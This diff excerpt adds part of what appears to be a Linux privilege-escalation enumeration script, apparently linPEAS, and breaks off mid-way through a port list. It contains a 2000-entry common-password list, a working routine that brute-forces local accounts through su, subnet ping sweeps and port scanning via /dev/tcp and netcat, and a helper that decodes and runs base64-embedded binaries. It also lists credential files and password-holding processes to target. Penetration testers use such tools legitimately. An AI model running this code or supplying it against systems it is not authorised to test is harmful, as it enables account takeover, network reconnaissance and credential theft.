+katherine kangaroo jenny immortal harris hamlet gracie fucking firefly chocolat bentley account 321321 2222 1a2b3c thompson theman strike stacey science running research polaris oklahoma mariposa marie leader julia island idontknow hitman german felipe fatcat fatboy defender applepie annette 010203 watson travel sublime stewart steve squirrel simon sexy pineapple phoebe paris panzer nadine master1 mario kelsey joker hongkong gorilla dinosaur connie bowling bambam babydoll aragorn andreas 456123 151515 wolves wolfgang turner semperfi reaper patience marilyn fletcher drpepper dorothy creation brian bluesky andre yankee wordpass sweet spunky sidney serena preston pauline passwort original nightmare miriam martinez labrador kristin kissme henry gerald garrett flash excalibur discovery dddddd danny collins casino broncos brendan brasil apple123 yvonne wonder window tomato sundance sasha reggie redwings poison mypassword monopoly mariah margarita lionking king football1 director darling bubba biscuit 44444444 wisdom vivian virgin sylvester street stones sprite spike single sherlock sandy rocker robin matt marianne linda lancelot jeanette hobbes fred ferret dodger cotton corona clayton celine cannabis bella andromeda 7654321 4444 werewolf starcraft sampson redrum pyramid prodigy paul michel martini marathon longhorn leopard judith joanne jesus1 inferno holly harold happy123 esther dudley dragon1 darwin clinton celeste catdog brucelee argentina alpine 147852369 wrangler william1 vikings trigger stranger silvia shotgun scarlett scarlet redhead raider qweasdzxc playstation mystery morrison honda february fantasia designer coyote cool bulldogs bernie baby asdfghj angel1 always adam 202020 wanker sullivan stealth skeeter saturday rodney prelude pingpong phillip peewee peanuts peace nugget newport myself mouse memphis lover lancer kristine james1 hobbit halloween fuckyou1 finger fearless dodgers delete cougar \
+charmed cassandra caitlin bismillah believe alice airforce 7777 viper tony theodore sylvia suzanne starfish sparkle server samsam qweqwe public pass1234 neptune marian krishna kkkkkk jungle cinnamon bitches 741852 trojan theresa sweetheart speaker salmon powers pizza overlord michaela meredith masters lindsey history farmer express escape cuddles carson candy buttercup brownie broken abc12345 aardvark Passw0rd 141414 124578 123789 12345678910 00000 universal trinidad tobias thursday surfing stuart stinky standard roller porter pearljam mobile mirage markus loulou jjjjjj herbert grace goldie frosty fighter fatima evelyn eagle desire crimson coconut cheryl beavis anonymous andres africa 134679 whiskey velvet stormy springer soldier ragnarok portland oranges nobody nathalie malibu looking lemonade lavender hitler hearts gotohell gladiator gggggg freckles fashion david1 crusader cosmos commando clover clarence center cadillac brooks bronco bonita babylon archer alexandre 123654789 verbatim umbrella thanks sunny stalker splinter sparrow selena russia roberts register qwert123 penguins panda ncc1701d miracle melvin lonely lexmark kitkat julie graham frances estrella downtown doodle deborah cooler colombia chemistry cactus bridge bollocks beetle anastasia 741852963 69696969 unique sweets station showtime sheena santos rock revolution reading qwerasdf password2 mongoose marlene maiden machine juliet illusion hayden fabian derrick crazy cooldude chipper bomber blonde bigred amazing aliens abracadabra 123qweasd wwwwww treasure timber smith shelly sesame pirates pinkfloyd passwords nature marlin marines linkinpark larissa laptop hotrod gambit elvis education dustin devils damian christy braves baller anarchy white valeria underground strong poopoo monalisa memory lizzie keeper justdoit house homer gerard ericsson emily divine colleen chelsea1 cccccc camera bonbon billie bigfoot badass asterix anna animals \
+andy achilles a1s2d3f4 violin veronika vegeta tyler test1234 teddybear tatiana sporting spartan shelley sharks respect raven pentium papillon nevermind marketing manson madness juliette jericho gabrielle fuckyou2 forgot firewall faith evolution eric eduardo dagger cristian cavalier canadian bruno blowjob blackie beagle admin123 010101 together spongebob snakes sherman reddog reality ramona puppies pedro pacific pa55w0rd omega noodle murray mollie mister halflife franco foster formula1 felix dragonball desiree default chris1 bunny bobcat asdf123 951753 5555 242424 thirteen tattoo stonecold stinger shiloh seattle santana roger roberta rastaman pickles orion mustang1 felicia dracula doggie cucumber cassidy britney brianna blaster belinda apple1 753951 teddy striker stevie soleil snake skateboard sheridan sexsex roxanne redman qqqqqqqq punisher panama paladin none lovelife lights jerry iverson inside hornet holden groovy gretchen grandma gangsta faster eddie chevelle chester1 carrot cannon button administrator a 1212 zxc123 wireless volleyball vietnam twinkle terror sandiego rose pokemon1 picture parrot movies moose mirror milton mayday maestro lollypop katana johanna hunting hudson grizzly gorgeous garbage fish ernest dolores conrad chickens charity casey blueberry blackman blackbird bill beckham battle atlantic wildfire weasel waterloo trance storm singapore shooter rocknroll richie poop pitbull mississippi kisses karen juliana james123 iguana homework highland fire elliot eldorado ducati discover computer1 buddy1 antonia alphabet 159951 123456789a 1123581321 0123456 zaq1xsw2 webmaster vagina unreal university tropical swimmer sugar southpark silence sammie ravens question presario poiuytrewq palmer notebook newman nebraska manutd lucas hermes gators dave dalton cheetah cedric camilla bullseye bridget bingo ashton 123asd yahoo volume valhalla tomorrow starlight scruffy roscoe richard1 positive \
+plymouth pepsi patrick1 paradox milano maxima loser lestat gizmo ghetto faithful emerson elliott dominique doberman dillon criminal crackers converse chrissy casanova blowme attitude"
+PASSTRY="2000" #Default num of passwds to try (all by default)
+
+if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this
+SEDOVERFLOW=true
+for grp in $(groups $USER 2>/dev/null | cut -d ":" -f2); do
+ wgroups="$wgroups -group $grp -or "
+done
+wgroups="$(echo $wgroups | sed -e 's/ -or$//')"
+while $SEDOVERFLOW; do
+ #WF=`find /dev /srv /proc /home /media /sys /lost+found /run /etc /root /var /tmp /mnt /boot /opt -type d -maxdepth $MAXPATH_FIND_W -writable -or -user $USER 2>/dev/null | sort`
+ #if [ "$MACPEAS" ]; then
+ WF=$(find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | sort) #OpenBSD find command doesn't have "-writable" option
+ #else
+ # WF=`find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" -and '(' -writable -or -user $USER ')' 2>/dev/null | sort`
+ #fi
+ Wfolders=$(printf "%s" "$WF" | tr '\n' '|')"|[a-zA-Z]+[a-zA-Z0-9]* +\*"
+ Wfolder="$(printf "%s" "$WF" | grep "/shm" | head -n1)" # Try to get /dev/shm
+ if ! [ "$Wfolder" ]; then
+ Wfolder="$(printf "%s" "$WF" | grep "tmp\|shm\|home\|Users\|root\|etc\|var\|opt\|bin\|lib\|mnt\|private\|Applications" | head -n1)"
+ fi
+ printf "test\ntest\ntest\ntest"| sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" >/dev/null 2>&1
+ if [ $? -eq 0 ]; then
+ SEDOVERFLOW=false
+ else
+ MAXPATH_FIND_W=$(($MAXPATH_FIND_W-1)) #If overflow of directories, check again with MAXPATH_FIND_W - 1
+ fi
+ if [ $MAXPATH_FIND_W -lt 1 ] ; then # prevent infinite loop
+ SEDOVERFLOW=false
+ fi
+done
+
+
+notExtensions="\.tif$|\.tiff$|\.gif$|\.jpeg$|\.jpg|\.jif$|\.jfif$|\.jp2$|\.jpx$|\.j2k$|\.j2c$|\.fpx$|\.pcd$|\.png$|\.pdf$|\.flv$|\.mp4$|\.mp3$|\.gifv$|\.avi$|\.mov$|\.mpeg$|\.wav$|\.doc$|\.docx$|\.xls$|\.xlsx$|\.svg$"
+
+TIMEOUT="$(command -v timeout 2>/dev/null)"
+STRACE="$(command -v strace 2>/dev/null)"
+STRINGS="$(command -v strings 2>/dev/null)"
+
+shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/dockerd-rootless.sh|/dockerd-rootless-setuptool.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/power_report.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh"
+
+notBackup="/tdbbackup$|/db_hotbackup$"
+
+cronjobsG=".placeholder|0anacron|0hourly|110.clean-tmps|130.clean-msgs|140.clean-rwho|199.clean-fax|199.rotate-fax|200.accounting|310.accounting|400.status-disks|420.status-network|430.status-rwho|999.local|anacron|apache2|apport|apt|aptitude|apt-compat|bsdmainutils|certwatch|cracklib-runtime|debtags|dpkg|e2scrub_all|exim4-base|fake-hwclock|fstrim|john|locate|logrotate|man-db.cron|man-db|mdadm|mlocate|ntp|passwd|php|popularity-contest|raid-check|rwhod|samba|standard|sysstat|ubuntu-advantage-tools|update-notifier-common|upstart|"
+cronjobsB="centreon"
+
+processesVB='jdwp|tmux |screen | inspect |--inspect[= ]|--inspect$|--inpect-brk|--remote-debugging-port'
+processesB="knockd|splunk"
+processesDump="gdm-password|gnome-keyring-daemon|lightdm|vsftpd|apache2|sshd:"
+
+mail_apps="Postfix|Dovecot|Exim|SquirrelMail|Cyrus|Sendmail|Courier"
+
+profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh|appmenu-qt5.sh|apps-bin-path.sh|bash_completion.sh|cedilla-portuguese.sh|colorgrep.csh|colorgrep.sh|colorls.csh|colorls.sh|colorxzgrep.csh|colorxzgrep.sh|colorzgrep.csh|colorzgrep.sh|csh.local|cursor.sh|gawk.csh|gawk.sh|kali.sh|lang.csh|lang.sh|less.csh|less.sh|flatpak.sh|sh.local|vim.csh|vim.sh|vte.csh|vte-2.91.sh|which2.csh|which2.sh|xauthority.sh|Z97-byobu.sh|xdg_dirs_desktop_session.sh|Z99-cloudinit-warnings.sh|Z99-cloud-locale-test.sh"
+
+knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|rogershimizu@gmail.com|thmarques@gmail.com"
+
+timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|plocate-updatedb.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-license-check.timer|ua-messaging.timer|ua-timer.timer|ureadahead-stop.timer"
+
+commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib32$|libx32$|/lib64$|lost\+found|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$"
+commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes"
+
+ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client64/lib/|/usr/lib/x86_64-linux-gnu/libfakeroot|/usr/lib/x86_64-linux-gnu|/usr/local/lib/x86_64-linux-gnu|/usr/local/lib"
+
+dbuslistG="^:1\.[0-9\.]+|com.hp.hplip|com.redhat.ifcfgrh1|com.redhat.NewPrinterNotification|com.redhat.PrinterDriversInstaller|com.redhat.RHSM1|com.redhat.RHSM1.Facts|com.redhat.tuned|com.ubuntu.LanguageSelector|com.ubuntu.SoftwareProperties|com.ubuntu.SystemService|com.ubuntu.USBCreator|com.ubuntu.WhoopsiePreferences|io.netplan.Netplan|io.snapcraft.SnapdLoginService|fi.epitest.hostap.WPASupplicant|fi.w1.wpa_supplicant1|NAME|org.blueman.Mechanism|org.bluez|org.debian.apt|org.fedoraproject.FirewallD1|org.fedoraproject.Setroubleshootd|org.fedoraproject.SetroubleshootFixit|org.fedoraproject.SetroubleshootPrivileged|org.freedesktop.Accounts|org.freedesktop.Avahi|org.freedesktop.bolt|org.freedesktop.ColorManager|org.freedesktop.DBus|org.freedesktop.DisplayManager|org.freedesktop.fwupd|org.freedesktop.GeoClue2|org.freedesktop.hostname1|org.freedesktop.import1|org.freedesktop.locale1|org.freedesktop.login1|org.freedesktop.machine1|org.freedesktop.ModemManager1|org.freedesktop.NetworkManager|org.freedesktop.network1|org.freedesktop.nm_dispatcher|org.freedesktop.PackageKit|org.freedesktop.PolicyKit1|org.freedesktop.portable1|org.freedesktop.realmd|org.freedesktop.RealtimeKit1|org.freedesktop.resolve1|org.freedesktop.systemd1|org.freedesktop.thermald|org.freedesktop.timedate1|org.freedesktop.timesync1|org.freedesktop.UDisks2|org.freedesktop.UPower|org.opensuse.CupsPkHelper.Mechanism"
+
+USEFUL_SOFTWARE="authbind aws base64 ctr curl doas docker fetch g++ gcc gdb kubectl lxc make nc nc.traditional ncat netcat nmap perl php ping podman python python2 python2.6 python2.7 python3 python3.6 python3.7 rkt ruby runc socat sudo wget xterm"
+TIP_DOCKER_ROOTLESS="In rootless mode privilege escalation to root will not be possible."
+GREP_DOCKER_SOCK_INFOS="Architecture|OSType|Name|DockerRootDir|NCPU|OperatingSystem|KernelVersion|ServerVersion"
+GREP_DOCKER_SOCK_INFOS_IGNORE="IndexConfig"
+GREP_IGNORE_MOUNTS="/ /|/null | proc proc |/dev/console"
+
+INT_HIDDEN_FILES=".bashrc|.bluemix|.cer|.cloudflared|.crt|.csr|.db|.der|.env|.erlang.cookie|.ftpconfig|.git|.git-credentials|.gitconfig|.github|.gnupg|.google_authenticator|.gpg|.htpasswd|.irssi|.jks|.k5login|.kdbx|.key|.keyring|.keystore|.keytab|.kube|.ldaprc|.lesshst|.mozilla|.msmtprc|.ovpn|.p12|.password-store|.pem|.pfx|.pgp|.plan|.profile|.psk|.pypirc|.rdg|.recently-used.xbel|.rhosts|.secrets.mkey|.service|.socket|.sqlite|.sqlite3|.sudo_as_admin_successful|.svn|.swp|.timer|.vault-token|.viminfo|.vnc|.wgetrc"
+
+
+###########################################
+#---------) Checks before start (---------#
+###########################################
+# --) ps working good
+# --) Network binaries
+
+if [ "$(ps auxwww 2>/dev/null | wc -l 2>/dev/null)" -lt 8 ]; then
+ NOUSEPS="1"
+fi
+
+DISCOVER_BAN_BAD="No network discovery capabilities (fping or ping not found)"
+FPING=$(command -v fping 2>/dev/null)
+PING=$(command -v ping 2>/dev/null)
+if [ "$FPING" ]; then
+ DISCOVER_BAN_GOOD="$GREEN$FPING${BLUE} is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)"
+else
+ if [ "$PING" ]; then
+ DISCOVER_BAN_GOOD="$GREEN$PING${BLUE} is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)"
+ fi
+fi
+
+SCAN_BAN_BAD="No port scan capabilities (nc and bash not found)"
+
+if [ "$(command -v bash)" ] && ! [ -L "$(command -v bash)" ]; then
+ FOUND_BASH=$(command -v bash);
+elif [ -f "/bin/bash" ] && ! [ -L "/bin/bash" ]; then
+ FOUND_BASH="/bin/bash";
+fi
+if [ "$FOUND_BASH" ]; then
+ SCAN_BAN_GOOD="$YELLOW[+] $GREEN$FOUND_BASH${BLUE} is available for network discovery & port scanning$LG ($SCRIPTNAME can discover hosts and scan ports, learn more with -h)\n"
+fi
+
+FOUND_NC=$(command -v nc 2>/dev/null)
+if [ -z "$FOUND_NC" ]; then
+ FOUND_NC=$(command -v netcat 2>/dev/null);
+fi
+if [ -z "$FOUND_NC" ]; then
+ FOUND_NC=$(command -v ncat 2>/dev/null);
+fi
+if [ -z "$FOUND_NC" ]; then
+ FOUND_NC=$(command -v nc.traditional 2>/dev/null);
+fi
+if [ -z "$FOUND_NC" ]; then
+ FOUND_NC=$(command -v nc.openbsd 2>/dev/null);
+fi
+if [ "$FOUND_NC" ]; then
+ SCAN_BAN_GOOD="$SCAN_BAN_GOOD$YELLOW[+] $GREEN$FOUND_NC${BLUE} is available for network discovery & port scanning$LG ($SCRIPTNAME can discover hosts and scan ports, learn more with -h)\n"
+fi
+
+
+###########################################
+#-----------) Main Functions (------------#
+###########################################
+
+echo_not_found (){
+ printf $DG"$1 Not Found\n"$NC
+}
+
+warn_exec(){
+ $* 2>/dev/null || echo_not_found $1
+}
+
+echo_no (){
+ printf $DG"No\n"$NC
+}
+
+print_title(){
+ if [ "$DEBUG" ]; then
+ END_T2_TIME=$(date +%s 2>/dev/null)
+ if [ "$START_T2_TIME" ]; then
+ TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME))
+ printf $DG"This check took $TOTAL_T2_TIME seconds\n"$NC
+ fi
+
+ END_T1_TIME=$(date +%s 2>/dev/null)
+ if [ "$START_T1_TIME" ]; then
+ TOTAL_T1_TIME=$(($END_T1_TIME - $START_T1_TIME))
+ printf $DG"The total section execution took $TOTAL_T1_TIME seconds\n"$NC
+ echo ""
+ fi
+
+ START_T1_TIME=$(date +%s 2>/dev/null)
+ fi
+
+ title=$1
+ title_len=$(echo $title | wc -c)
+ max_title_len=80
+ rest_len=$((($max_title_len - $title_len) / 2))
+
+ printf ${BLUE}
+ for i in $(seq 1 $rest_len); do printf " "; done
+ printf "╔"
+ for i in $(seq 1 $title_len); do printf "═"; done; printf "═";
+ printf "╗"
+
+ echo ""
+
+ for i in $(seq 1 $rest_len); do printf "═"; done
+ printf "╣ $GREEN${title}${BLUE} ╠"
+ for i in $(seq 1 $rest_len); do printf "═"; done
+
+ echo ""
+
+ printf ${BLUE}
+ for i in $(seq 1 $rest_len); do printf " "; done
+ printf "╚"
+ for i in $(seq 1 $title_len); do printf "═"; done; printf "═";
+ printf "╝"
+
+ printf $NC
+ echo ""
+}
+
+print_2title(){
+ if [ "$DEBUG" ]; then
+ END_T2_TIME=$(date +%s 2>/dev/null)
+ if [ "$START_T2_TIME" ]; then
+ TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME))
+ printf $DG"This check took $TOTAL_T2_TIME seconds\n"$NC
+ echo ""
+ fi
+
+ START_T2_TIME=$(date +%s 2>/dev/null)
+ fi
+
+ printf ${BLUE}"╔══════════╣ $GREEN$1\n"$NC #There are 10 "═"
+}
+
+print_3title(){
+ printf ${BLUE}"══╣ $GREEN$1\n"$NC #There are 2 "═"
+}
+
+print_3title_no_nl(){
+ printf ${BLUE}"\r══╣ $GREEN${1}..."$NC #There are 2 "═"
+}
+
+print_list(){
+ printf ${BLUE}"═╣ $GREEN$1"$NC #There is 1 "═"
+}
+
+print_info(){
+ printf "${BLUE}╚ ${ITALIC_BLUE}$1\n"$NC
+}
+
+print_ps (){
+ (ls -d /proc/*/ 2>/dev/null | while read f; do
+ CMDLINE=$(cat $f/cmdline 2>/dev/null | grep -av "seds,"); #Delete my own sed processess
+ if [ "$CMDLINE" ];
+ then var USER2=ls -ld $f | awk '{print $3}'; PID=$(echo $f | cut -d "/" -f3);
+ printf " %-13s %-8s %s\n" "$USER2" "$PID" "$CMDLINE";
+ fi;
+ done) 2>/dev/null | sort -r
+}
+
+su_try_pwd (){
+ BFUSER=$1
+ PASSWORDTRY=$2
+ trysu=$(echo "$PASSWORDTRY" | timeout 1 su $BFUSER -c whoami 2>/dev/null)
+ if [ "$trysu" ]; then
+ echo " You can login as $BFUSER using password: $PASSWORDTRY" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+ fi
+}
+
+su_brute_user_num (){
+ BFUSER=$1
+ TRIES=$2
+ su_try_pwd "$BFUSER" "" & #Try without password
+ su_try_pwd "$BFUSER" "$BFUSER" & #Try username as password
+ su_try_pwd "$BFUSER" "$(echo $BFUSER | rev 2>/dev/null)" & #Try reverse username as password
+ if [ "$PASSWORD" ]; then
+ su_try_pwd "$BFUSER" "$PASSWORD" & #Try given password
+ fi
+ for i in $(seq "$TRIES"); do
+ su_try_pwd "$BFUSER" "$(echo $top2000pwds | cut -d ' ' -f $i)" & #Try TOP TRIES of passwords (by default 2000)
+ sleep 0.007 # To not overload the system
+ done
+ wait
+}
+
+check_if_su_brute(){
+ error=$(echo "" | timeout 1 su $(whoami) -c whoami 2>&1);
+ if ! echo $error | grep -q "must be run from a terminal"; then
+ echo "1"
+ fi
+}
+
+eval_bckgrd(){
+ eval "$1" &
+ CONT_THREADS=$(($CONT_THREADS+1)); if [ "$(($CONT_THREADS%$THREADS))" -eq "0" ]; then wait; fi
+}
+
+macosNotSigned(){
+ for filename in $1/*; do
+ if codesign -vv -d \"$filename\" 2>&1 | grep -q 'not signed'; then
+ echo "$filename isn't signed" | sed -${E} "s,.*,${SED_RED},"
+ fi
+ done
+}
+
+execBin(){
+ TOOL_NAME=$1
+ TOOL_LINK=$2
+ B64_BIN=$3
+ PARAMS=$4
+ if [ "$B64_BIN" ]; then
+ echo ""
+ print_3title "Running $TOOL_NAME"
+ print_info "$TOOL_LINK"
+ echo "$B64_BIN" | base64 -d > $Wfolder/bin
+ chmod +x $Wfolder/bin
+ eval "$Wfolder/bin $PARAMS"
+ rm -f $Wfolder/bin
+ echo ""
+ fi
+}
+
+###########################################
+#---------) Internet functions (----------#
+###########################################
+check_tcp_80(){
+ (timeout -s KILL 20 /bin/bash -c '( echo >/dev/tcp/1.1.1.1/80 && echo "Port 80 is accessible" || echo "Port 80 is not accessible") 2>/dev/null | grep "accessible"') 2>/dev/null || echo "Port 80 is not accessible"
+}
+check_tcp_443(){
+ (timeout -s KILL 20 /bin/bash -c '(echo >/dev/tcp/1.1.1.1/443 && echo "Port 443 is accessible" || echo "Port 443 is not accessible") 2>/dev/null | grep "accessible"') 2>/dev/null || echo "Port 443 is not accessible"
+}
+check_icmp(){
+ (timeout -s KILL 20 /bin/bash -c '(ping -c 1 1.1.1.1 | grep "1 received" && echo "Ping is available" || echo "Ping is not available") 2>/dev/null | grep "available"') 2>/dev/null || echo "Ping is not available"
+}
+#DNS function from: https://unix.stackexchange.com/questions/600194/create-dns-query-with-netcat-or-dev-udp
+#I cannot use this function because timeout doesn't find it, so it's copy/pasted below
+check_dns(){
+ (timeout 20 /bin/bash -c '(( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/1.1.1.1/53 && echo "DNS available" || echo "DNS not available") 2>/dev/null | grep "available"' ) 2>/dev/null || echo "DNS not available"
+}
+
+###########################################
+#----------) Network functions (----------#
+###########################################
+# Adapted from https://github.com/carlospolop/bashReconScan/blob/master/brs.sh
+
+basic_net_info(){
+ print_title "Basic Network Info"
+ (ifconfig || ip a) 2>/dev/null
+ echo ""
+}
+
+select_nc (){
+ #Select the correct configuration of the netcat found
+ NC_SCAN="$FOUND_NC -v -n -z -w 1"
+ $($FOUND_NC 127.0.0.1 65321 > /dev/null 2>&1)
+ if [ $? -eq 2 ]
+ then
+ NC_SCAN="timeout 1 $FOUND_NC -v -n"
+ fi
+}
+
+icmp_recon (){
+ #Discover hosts inside a /24 subnetwork using ping (start pingging broadcast addresses)
+ IP3=$(echo $1 | cut -d "." -f 1,2,3)
+
+ (timeout 1 ping -b -c 1 "$IP3.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") &
+ (timeout 1 ping -b -c 1 "255.255.255.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") &
+ for j in $(seq 0 254)
+ do
+ (timeout 1 ping -b -c 1 "$IP3.$j" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") &
+ done
+ wait
+}
+
+tcp_recon (){
+ #Discover hosts inside a /24 subnetwork using tcp connection to most used ports and selected ones
+ IP3=$(echo $1 | cut -d "." -f 1,2,3)
+ PORTS=$2
+ printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " "
+ printf "$NC\n"
+
+ for port in $PORTS; do
+ for j in $(seq 1 254)
+ do
+ if [ "$FOUND_BASH" ] && [ "$$TIMEOUT" ]; then
+ $TIMEOUT 5 $FOUND_BASH -c "(echo </dev/tcp/$IP3.$j/$port) 2>/dev/null && echo -e \"\n[+] Open port at: $IP3.$j:$port\"" &
+ elif [ "$NC_SCAN" ]; then
+ ($NC_SCAN "$IP3"."$j" "$port" 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") &
+ fi
+ done
+ wait
+ done
+}
+
+tcp_port_scan (){
+ #Scan open ports of a host. Default: nmap top 1000, but the user can select others
+ basic_net_info
+
+ print_title "Network Port Scanning"
+ IP=$1
+ PORTS="$2"
+
+ if [ -z "$PORTS" ]; then
+ printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: DEFAULT (nmap top 1000)" $NC | tr '\n' " "
+ printf "$NC\n"
+ PORTS="1 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30 32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113 119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280 301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497 500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631 636 646 648 666 667 668 683 687 691 700 705 711 714 720 722 726 749 765 777 783 787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993 995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110 1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138 1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183 1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247 1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352 1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583 1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761 1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971 1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047 2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144 2160 2161 2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381 2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607 2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920 2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071 3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324 3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546 3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828 3851 3869 3871 3878 3880 3889 3905 3914 3918 3920 3945 3971 3986 3995 3998 4000 4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343 4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003 5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190 5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500 5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 5718 5730 5800 5801 5802 5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907 5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998 5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112 6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667 6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002 7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625 7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007 8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086 8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290 8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800 8873 8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 